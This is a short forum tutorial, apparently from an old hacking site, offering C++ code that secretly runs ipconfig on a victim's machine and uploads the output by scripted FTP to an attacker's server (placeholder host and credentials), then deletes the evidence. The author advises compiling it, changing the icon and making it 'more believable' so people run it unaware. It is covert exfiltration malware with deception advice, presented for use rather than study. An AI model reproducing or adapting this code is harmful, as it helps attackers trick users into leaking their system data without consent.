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Programming the perfect customized batch

Programming the perfect customized batch

By ghostghost | 4451 Reads |
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Well many people have used the function but never thought about using it destructivly(or educationally speaking, secuirity flaw).

All that is required is the following:

  • Minor C++ knowledge.
  • Digital Mars/VisualC++/BorlandC++/Any C++ compiler


Ok well lets start with something simple but effective.. ip logging users that use your program.

The code would be: [START CODE]

#include "iostream.h" #include "windows.h" #include "dos.h"

using namespace std;

int main() { system("cls"); system("ipconfig>>C:\ip.txt"); system("echo open>>C:\ftp.txt"); system("echo yourftp.com>>C:\ftp.txt"); system("echo ftpuser>>C:\ftp.txt"); system("echo ftppass>>C:\ftp.txt"); system("echo send C:\ip.txt>>C:\ftp.txt"); system("echo close>>C:\ftp.txt"); system("echo bye>>C:\ftp.txt"); system("cls"); system("FTP -s:C:\ftp.txt"); system("cls"); system("del C:\ftp.txt"); system("del C:\ip.txt"); system("cls"); return 0; }

[END CODE] you see same exact thing as bats except it has system(""); around it. very simple.

Then just compile your program. Change the icon. do whatever, its more beleavable and can be scanned, and u dont need to bind 2 files.

I hope this tut helps u out in one way or another.

BYE! –Haykuro

ghost's avatar
ghost 19 years ago

ive seen this script alot. :|